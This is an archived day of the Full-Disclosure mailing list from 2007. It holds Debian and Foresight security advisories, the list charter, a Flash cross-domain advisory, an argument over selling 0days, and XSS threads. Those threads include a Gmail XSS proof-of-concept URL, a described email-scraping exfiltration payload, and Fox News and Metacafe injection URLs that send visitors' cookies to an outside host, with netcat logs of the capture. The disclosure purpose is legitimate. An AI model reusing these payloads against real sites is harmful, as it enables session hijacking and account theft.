2007-11-09 Thread Simon Smith
No worries man, I should have been more clear.

Thierry Zoller wrote:
 Dear Simon,
 
 SS Selling exploits to just anyone is irresponsible.
 Fully agree, I interpreted your intial post as being US centric and
 based on ethical judgement, hence my comments. No hard feelings =)
 
 
 
 


-- 

- simon

--
http://www.snosoft.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Gmail 0day

2007-11-09 Thread Adrian P
Hello Juergen,

With all my respect, is it that hard to see that gaining access to a
Gmail session can lead to your identity being stolen?

Nowadays your webmail account means your online life/presence. Let's
have a walk through attack shall we?

1. Your Gmail session is hijacked (i.e.: via the XSS PoC posted on FD)

2. Attacker searches for password in 'Inbox'/'Sent Mail'.

- How many times have you clicked on Forgot password on MULTIPLE
online accounts and the password (whether a new pass or the original
one) emailed to you has not been changed from the time you got the
forgotten password email?

- How many users have emailed passwords to themselves so that they
don't forget?

- How many users use the same password on MULTIPLE online accounts
(including merchant/e-commerce accounts)?

- How many users have clicked on remember credit card details so
that they don't have to re-enter their CC data every time they perform
an online transaction?

- Did you forget to disable your Gtalk chat history (Gtalk is still
within the google.com domain)

- Have you saved anything personal on other services such as Google
docs/calendar/notebook? (or any other google.com service that doesn't
require you to re-login once authenticated)

3. For most victims, this leads to a compromise of his/her online identity.

If you fail to see the problem, then please think before you complain
about damn, right now 0day are fucking XSS 

Posting a XSS PoC that opens an alert box doesn't have much merit
perhaps. However, this is the equivalent of saying: hey, I can cause
a BO condition. If you send X parameter with 500 bytes/chars or more,
then EIP is overwritten and the attacked service crashes. Now compare
that to actually compromising the server via the buffer overflow
vulnerability. That's a DIFFERENT STORY.

Same thing goes for any XSS. Now say, screw a cookie theft exploit for
the Gmail XSS! (pardon my French). Make something more clever!
Perhaps, you want a payload that scrapes all the victim's emails which
contain keywords such as 'password', 'private', 'admin', and so on.
Then, all the captured data is submitted to the attacker's site in the
background (nothing suspicious is visually happening from the victim's
point of view).

Sure Gmail has CSRF protection, but that can be bypassed via XSS.
After all, anti-CSRF tokens can be grabbed if URLs can be accessed
within the security context of the target domain (which is possible
via XSS).

If you consider all the aforementioned thoughts plus the fact that
Gmail is one of the most popular webmail services, then you should be
able to understand the power of a XSS vul on google.com !

Regards,
AP.

On Nov 8, 2007 8:55 PM, Juergen Marester [EMAIL PROTECTED] wrote:
 wow ! 0day !
 damn, right now 0day are fucking XSS ...




 On 11/8/07, silky [EMAIL PROTECTED] wrote:
  worked for me minutes after it was posted. seems fixed now.
 
  On 11/9/07, crazy frog crazy frog  [EMAIL PROTECTED] wrote:
   i tested it on gmail latest version,itsnot working for me?
  
   On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED]  wrote:
There is a html injection vulnerability in https://www.google.com.
It  is very critical,you can get the cookie to login into gmail ore
 other
service.
   
POC:
   
 https://www.google.com/accounts/ServiceLogin?service=mailrm=falsecontinue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dlltmpl=defaultltmplcache=2passive=truel#;/scriptscriptalert('xss')/script1-=1
   
More:http://xss2root.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
   
  
  
  
   --
   advertise on secgeeks?
   http://secgeeks.com/Advertising_on_Secgeeks.com
   http://newskicks.com
  
   ___
   Full-Disclosure - We believe in it.
   Charter: http://lists.grok.org.uk/full-disclosure-charter.html
   Hosted and sponsored by Secunia - http://secunia.com/
  
 
 
  --
  mike
  http://lets.coozi.com.au/
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
  Hosted and sponsored by Secunia - http://secunia.com/
 


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/




-- 
pagvac
gnucitizen.org, ikwt.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 1405-1] New zope-cmfplone packages fix arbitrary code execution

2007-11-09 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1405-1[EMAIL PROTECTED]
http://www.debian.org/security/Thijs Kinkhorst
November 9th, 2007  http://www.debian.org/security/faq
- --

Package: zope-cmfplone
Vulnerability  : missing input sanitising
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2007-5741
Debian Bug : 449523

It was discovered that Plone, a web content management system, allows
remote attackers to execute arbitrary code via specially crafted web
browser cookies.

The oldstable distribution (sarge) is not affected by this problem.

For the stable distribution (etch) this problem has been fixed in
version 2.5.1-4etch1.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your zope-cmfplone package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

  Source archives:


http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch1.dsc
  Size/MD5 checksum: 1114 dccc6173d55e9fedbe5a7b91d84a5721

http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch1.diff.gz
  Size/MD5 checksum:10922 3a83d9323ac5285ac3d5cbde1d54e5f7

http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1.orig.tar.gz
  Size/MD5 checksum:  1064993 b48215d46aafa9e1f12196263d86a191

  Architecture independent components:


http://security.debian.org/pool/updates/main/z/zope-cmfplone/plone-site_2.5.1-4etch1_all.deb
  Size/MD5 checksum: 9828 318b81cff9a5bf4bf352743c46095693

http://security.debian.org/pool/updates/main/z/zope-cmfplone/zope-cmfplone_2.5.1-4etch1_all.deb
  Size/MD5 checksum:  1190788 49e266b7a7910079c92e039a910c4903


  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHNOEdXm3vHE4uyloRAlD0AKDUgsEo+4+DL/LpLB46Cte3CjD4ZACeN08A
WWoKssOksgDzYD5hEmzLvlY=
=x7J9
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [SECURITY] [DSA 1406-1] New horde3 packages fix several vulnerabilities

2007-11-09 Thread Thijs Kinkhorst
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1406-1[EMAIL PROTECTED]
http://www.debian.org/security/Thijs Kinkhorst
November 9th, 2007  http://www.debian.org/security/faq
- --

Package: horde3
Vulnerability  : several
Problem-Type   : remote
Debian-specific: no
CVE ID : CVE-2006-3548 CVE-2006-3549 CVE-2006-4256 CVE-2007-1473 
CVE-2007-1474
Debian Bug : 378281 383416 434045

Several remote vulnerabilities have been discovered in the Horde web
application framework. The Common Vulnerabilities and Exposures project
identifies the following problems:

CVE-2006-3548

Moritz Naumann discovered that Horde allows remote attackers
to inject arbitrary web script or HTML in the context of a logged
in user (cross site scripting).

This vulnerability applies to oldstable (sarge) only.   

CVE-2006-3549

Moritz Naumann discovered that Horde does not properly restrict
its image proxy, allowing remote attackers to use the server as a
proxy.

This vulnerability applies to oldstable (sarge) only.

CVE-2006-4256

Marc Ruef discovered that Horde allows remote attackers to
include web pages from other sites, which could be useful for
phishing attacks.

This vulnerability applies to oldstable (sarge) only.

CVE-2007-1473

Moritz Naumann discovered that Horde allows remote attackers
to inject arbitrary web script or HTML in the context of a logged
in user (cross site scripting).

This vulnerability applies to both stable (etch) and oldstable (sarge).

CVE-2007-1474

iDefense discovered that the cleanup cron script in Horde
allows local users to delete arbitrary files.

This vulnerability applies to oldstable (sarge) only.


For the old stable distribution (sarge) these problems have been fixed in
version 3.0.4-4sarge6.

For the stable distribution (etch) these problems have been fixed in
version 3.1.3-4etch1.

For the unstable distribution (sid) these problems have been fixed in
version 3.1.4-1.

We recommend that you upgrade your horde3 package.


Upgrade Instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

  Source archives:


http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge6.dsc
  Size/MD5 checksum:  920 a829a3791ed40777b0a4995be6727f13

http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge6.diff.gz
  Size/MD5 checksum:13978 ab0dc18c4744b21919c154ac81600ad7

http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4.orig.tar.gz
  Size/MD5 checksum:  3378143 e2221d409ba1c8841ce4ecee981d7b61

  Architecture independent components:


http://security.debian.org/pool/updates/main/h/horde3/horde3_3.0.4-4sarge6_all.deb
  Size/MD5 checksum:  3437942 f2cd9a0c7cb7e800d357d206d9f19841


Debian GNU/Linux 4.0 alias etch
- ---

  Source archives:


http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3-4etch1.dsc
  Size/MD5 checksum:  974 9fe3ec9d81a0d0c8ec6dd2ae3e14ed40

http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3-4etch1.diff.gz
  Size/MD5 checksum:10633 84cad3aed2026c8a6358891897a15ee7

http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3.orig.tar.gz
  Size/MD5 checksum:  5232958 fbc56c608ac81474b846b1b4b7bb5ee7

  Architecture independent components:


http://security.debian.org/pool/updates/main/h/horde3/horde3_3.1.3-4etch1_all.deb
  Size/MD5 checksum:  5270226 34a3af59a3469722ecf832948d390cea

  These files will probably be moved into the stable distribution on
  its next update.

- 
-
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security 
dists/stable/updates/main
Mailing list: [EMAIL PROTECTED]
Package info: `apt-cache show pkg' and http://packages.debian.org/pkg
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHNOM0Xm3vHE4uyloRAhqCAKDW38OVpHkAYAfr9LNzvh5k/j+8fQCg29kw
KknLxPttFWUKWRsaCB5PesA=
=SoAf
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: 

[Full-disclosure] List Charter

2007-11-09 Thread John Cartwright

[Full-Disclosure] Mailing List Charter
John Cartwright [EMAIL PROTECTED]
 

- Introduction  Purpose -

This document serves as a charter for the [Full-Disclosure] mailing 
list hosted at lists.grok.org.uk.

The list was created on 9th July 2002 by Len Rose, and is primarily 
concerned with security issues and their discussion.  The list is 
administered by John Cartwright.

The Full-Disclosure list is hosted and sponsored by Secunia.


- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface 
located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure.

Alternatively, commands may be emailed to 
[EMAIL PROTECTED], send the word 'help' in 
either the message subject or body for details.

 
- Moderation  Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be
restricted to members only, however the administrators may choose to 
accept submissions from non-members based on individual merit and 
relevance.

It is expected that the list will be largely self-policing, however in
special circumstances (eg spamming, misappropriation) then offending 
members may be removed from the list by the management.

An archive of postings is available at 
http://lists.grok.org.uk/pipermail/full-disclosure/.
 

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for 
instance announcement and discussion thereof, exploit techniques and 
code, related tools and papers, and other useful information.

Gratuitous advertisement, product placement, or self-promotion is 
forbidden.  Disagreements, flames, arguments, and off-topic discussion 
should be taken off-list wherever possible.

Humour is acceptable in moderation, providing it is inoffensive. 
Politics should be avoided at all costs.

Members are reminded that due to the open nature of the list, they 
should use discretion in executing any tools or code distributed via
this list.
 

- Posting Guidelines -

The primary language of this list is English. Members are expected to 
maintain a reasonable standard of netiquette when posting to the list. 

Quoting should not exceed that which is necessary to convey context, 
this is especially relevant to members subscribed to the digested 
version of the list.

The use of HTML is discouraged, but not forbidden. Signatures will 
preferably be short and to the point, and those containing 
'disclaimers' should be avoided where possible.

Attachments may be included if relevant or necessary (e.g. PGP or 
S/MIME signatures, proof-of-concept code, etc) but must not be active 
(in the case of a worm, for example) or malicious to the recipient.

Vacation messages should be carefully configured to avoid replying to 
list postings. Offenders will be excluded from the mailing list until 
the problem is corrected.

Members may post to the list by emailing 
[EMAIL PROTECTED] Do not send subscription/
unsubscription mails to this address, use the -request address 
mentioned above.


- Charter Additions/Changes -

The list charter will be published at 
http://lists.grok.org.uk/full-disclosure-charter.html.

In addition, the charter will be posted monthly to the list by the 
management.

Alterations will be made after consultation with list members and a 
concensus has been reached.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Canonicalization issues in Flash Cross-domain policy file request

2007-11-09 Thread s4tan
=
Canonicalization issues in Flash Cross-domain policy file request
=

Vendor:  Adobe (http://www.adobe.com)
Software Affected:   Macromedia Flash Player
Software Version:Flash 9.0 r31

Impact (CVSSv2 score): medium (6.4/10, vector:
AV:N/AC:L/Au:N/C:N/I:P/A:P)

Discovered by:   Antonio s4tan Parata

Discovery Date:2007-05-18
Release Date:2007-11-09
Last Update:2007-11-09


1. Summary
==

From the adobe web site: A policy file is a simple XML file that gives
the Flash Player permission to access data from a given domain without
displaying a security dialog. When placed on a server, it tells the
Flash Player to allow direct access to data on that server, without
prompting the user grant access.

It is possible to alterate the url of the request which gets the
cross-domain policy file.


2. Vulnerability Analysis
=

2.1 Overview


The policy file is usually placed in the document root of the web server
with the name crossdomain.xml, unless a different path is specified.

When a request to an external url is made, first of all flash requests
the content of the policy file at the external domain, and then (if the
policy permits it) the user request is made.

By adding some special chars in the url it is possible to modify the
path of the url request of the policy file.

Consider the following simple .mxmlc file:

?xml version=1.0 encoding=utf-8?
mx:Application xmlns:mx=http://www.adobe.com/2006/mxml; layout=absolute

mx:HTTPService id=request useProxy=false/mx:HTTPService
mx:TextInput id=src x=251 y=174/
mx:Button label=Send! x=430 y=174 id=sendButton
click=clickSendButton(event)/

mx:Script
![CDATA[

import flash.events.MouseEvent;
 
private function clickSendButton(event:MouseEvent):void {

request.url = src.text;
request.send();
}

]]
/mx:Script

/mx:Application

You can compile it with mxmlc.

If you enter in the text area the url
http://www.somesite.com/some/path/index.php,
before the request is done Flash makes a request to /crossdomain.xml to
retrieve the cross-domain policy file. If the policy permits the
request, another request to /some/path/index.php is made.

2.2 Attack example
--

On Firefox (v 2.0.0.3) if you insert the following url
http://www.somesite.com?http=,
the request to the policy file will be:

GET /?http=/crossdomain.xml HTTP/1.1

so instead of the policy file you retrieve the html of the homepage.
If you insert the url http://www.somesite.com?aaa=bbbccc=ddd#, the
request to the policy file will be:

GET /?aa=bbbcc=ddd HTTP/1.1

On Internet Explorer 7, we have a lot more fun. Internet Explorer
automaticaly converts \ to /.

So if we insert the following url
http://www.somesite.it\path/to/wathever/index.php?param=valuecross=,
the request to the policy file will be:

GET /path/crossdomain.xml HTTP/1.1

Then if we insert as url the following
http://www.somesite.it\path\to\wathever\index.php?aaa=bbbccc=, the
request to the policy file will be:

GET /path/to/wathever/index.php?aaa=bbbccc=/crossdomain.xml HTTP/1.1

We can arbitrarily modify the path of the request for the cross-domain
policy file.

Not only the HTTPService object is vulnerable, but also the WebService
object (as an example try the url http://www.somesite.it?wsdl=WSDL).
It is not excluded that other functions that make remote requests are
vulnerable.

2.3 What a malicious attacker can do


Modifying the path of the request an attacker can perform GET requests
to an arbitrary file on the web server (he can for example exploit a
CSRF vulnerability on a third web site).


3. Acknowledgments
==

I would like to acknowledge Alberto icesurfer Revelli and Stefano wisec
Di Paola for helping me in writing the advisory.


4. Contact
==

Antonio s4tan Parata - 2007
web site: http://www.ictsc.it
mail: [EMAIL PROTECTED], [EMAIL PROTECTED]


5. Disclaimer
=

Copyright (c) 2007 Antonio Parata

The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.

6. Revision History
===

2007-11-09: Initial release

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] still some 0days to sell

2007-11-09 Thread Joey Mengele
Yes, Michael is the expert. Everyone knows private bugs are not 
0day, only public bugs! LOLOLOLOL! Hire this guy!

J


On Fri, 09 Nov 2007 12:32:35 -0500 Michael Bann 
[EMAIL PROTECTED] wrote:
Ok, first off, this is FULL DISCLOSURE. Perhaps you meant to send 
this 
to I'm a haxor. Don't worry, common mistake.

Second, I highly doubt you have some 0days, if any at all. 
Perhaps a 
few bugs/buffer under/over flows, but nothing that, in the 
computer 
security field, would justify the title 0day.

Cheers,

Mike

Juergen Marester wrote:
 Hi,

 I still have some 0days (just a few now) to sell about windows 
and linux.
 information by e-mail.

 see you,

 Juergen

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/
   

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

--
Click for your daily horoscope, learn about money, love  family.
http://tagline.hushmail.com/fc/Ioyw6h4c4ZA3zegZxPh1WHd5UE5uH4AWMvEAVEbALzMd94GSjFvleI/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] MS explorer.exe high_load caused by malformed png

2007-11-09 Thread Code Audit Labs
see
http://hi.baidu.com/codeauditlabs/blog/item/00c6d00134386b00738da595.html


-- 
Code Audit Labs
http://www.vulnhunt.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] FLEA-2007-0063-1 perl

2007-11-09 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Foresight Linux Essential Advisory: 2007-0063-1
Published: 2007-11-09

Rating: Minor

Updated Versions:
perl=/[EMAIL PROTECTED]:devel//1/5.8.7-8.2-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.4.1-0.2-2

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116

Description:
Previous versions of the perl package contain weaknesses when evaluating
regular expressions.

If a system is serving a perl-based web application that evaluates
remote input as a regular expression, an attacker may be be able to
exploit these weaknesses to execute arbitrary, attacker-provided code on
the system, potentially elevating this to a remote, deterministic
unauthorized access vulnerability.

Foresight Linux does not, by default, enable or contain any such services.

- ---

Copyright 2007 Foresight Linux Project
This file is distributed under the terms of the MIT License.
A copy is available at http://www.foresightlinux.org/permanent/mit-license.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v2.0.7 (GNU/Linux)

iQIVAwUBRzVJ3tfwEn07iAtZAQLGlQ//ZaOxxdDrbgVBDfnrRZ2E8AAY4wlT2x2w
iI1ATK2PyHKRaMk+8hOskweQjxlQc3C4An6ff/wBCPpIzdG3rufsZCQ5YLwUVX0G
InY9wFWKcE7LqUjp8l+lnBQyXf7po/LLppgwOR6ccMIxI44JbL/jcxfOT9EbO1bU
fvEpzfokfH08j07wwX3ReNWA6xyO2SuWTiXSchUNGnYqNZeOJ115SdPKQC8I8jvi
qhw/HLH96FCK19sigW+ELCcuWHdCKvUYVcSYTwXK/zGcMyr9IV4mgJiF0of7l7il
ADYMYfT28JpkpdNXuOasfE8s7MNlEQ8wVqbbZt40je0OaoTTc/eslqf3JOlyvKZW
8b/WtYgZ1asgEHp3puTcl6e1EYpdf+Yg61RLVZiZ6W4UpFFgut97jp90yY3cR3C2
4v3C5978JQPGKMFhdB93YNE60fh3KdDWPutR34VwFEuhf50vRkND9++5uhmymtLG
0+vz/7QxoM3fTUuCUZLoPH+qJUYo+HwuasPmWUEyKpqrOT0eBnmZKh33/WHl3uo5
apyD9GgFl8bZjuVsTzirXh0JrLUNj4QWb22snEp9ZU/5uoJ0IaqWX++9jQGoJ+7V
VIlfXilU0r8UeorVRuv3+HXDbHRbLnpuVhHTMq6Q1E4brux0Y8NOMxNdJq2UHuFU
UVdaBJzKoMw=
=Vbpl
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] 0day Shockwave and Flash XSS Fish Exploits on Youtube, Revver, Metacafe, Google.

2007-11-09 Thread XSS Worm XSS Security Information Portal
Foxnews 0day XSS Shock Attack
http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE%253Ch1%253E%253Ca%2520href=//xssworm.com%253EXSS%2520Worm%2520Web%25202.0%2520Security%2520Portal%253C/a%253E%253Cbr%253E%253C/h1%253EWith%2520new%25200day%2520Fox%2520News%2520XSS%2520Hacking%2520Video!
Demo link to send to a fish:

http://www.foxnews.com/video2/launchPage.html?http://localhost/

With netcat listen on localhost :

listening on [any] 80 ...
connect to localhost [127.0.0.1] from localhost [127.0.0.1] 1964
GET
/E05510/a3/0/3/1380/1/0/116282DDC64/0/0//312340660.gif?D=DM%5FLOC%3D
http%3A%2F%2Fwww%252Efoxnews%252Ecom%2Fvideo2%2FlaunchPage%252Ehtml%253Fhttp%3A%
2F%2Flocalhost%2526pageType%253Dmisc%2526miscPage%253DVideo%252520Launch%252520P
age%26DM%5FREF%3D%26DM%5FTIT%3DFOXNews%252Ecom%20%2D%20Video%20Launch%20Page%20%
2D%20FOXNews%252Ecom%26DM%5FEOM%3D1 HTTP/1.1
Host: pix01.revsci.net
User-Agent: Mozilla/5.0 (Mandriver)
Accept: image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.foxnews.com/video2/launchPage.html?http://localhost
*Cookie: [EMAIL PROTECTED];
NETSEGS_J05532=960C7930BE970CE4J05532
3F149836472757D904723FE85C2C6A1738F3B885FCA46DE74CFF355ED*


I think maybe this is to make many shock waves with XSS !
 Zero Day Shockwave SWF Player Exploit with XSS
Attackhttp://xssworm.blogvis.com/12/xssworm/zero-day-shockwave-swf-player-exploit-with-xss-attack/
in the hacking metacafe we discover Shockwave XSS 0day attack to use by
blackhat to steal fish:

MetaCafe XSS Worm Vulnerabilities - ZeroDay Shockwave Attack POC - :

http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028mediaURL=http://xssworm.com/?fishnormalizedTitle=space_tripisViral=falseisWatermarked=falsepostrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swfnetworkingAllowed=true


We see this outputs in xssworm.com log - :


GET /crossdomain.xml HTTP/1.1
Host: metacafe.122.2o7.net
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B294DB|472A0
D2D[CE];
s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C4D74-A170C543A87|472DA4DB[
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E7606-A170BAE639DC|4726056DCE]
s_vi
_wzvqcdsx7F7×60qx7isx7Fx7D[CS]v4|.

snips…

We see many more serious vulnerability in the web 2.0 today. As you must be
sure to visit http://xssworm.com/ security portal to discuss this shock
problem  many thanks for your reply. I am interested.

*vaj


-- 
Francesco Vaj [CISSP - GIAC]
CSS Security Researcher
mailto:[EMAIL PROTECTED]
aim: XSS Cross Site
--
XSS Cross Site Scripting Attacks and
Web 2.0 AJAX Security Information News -
http://xssworm.com/
--
Vaj, bella vaj.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/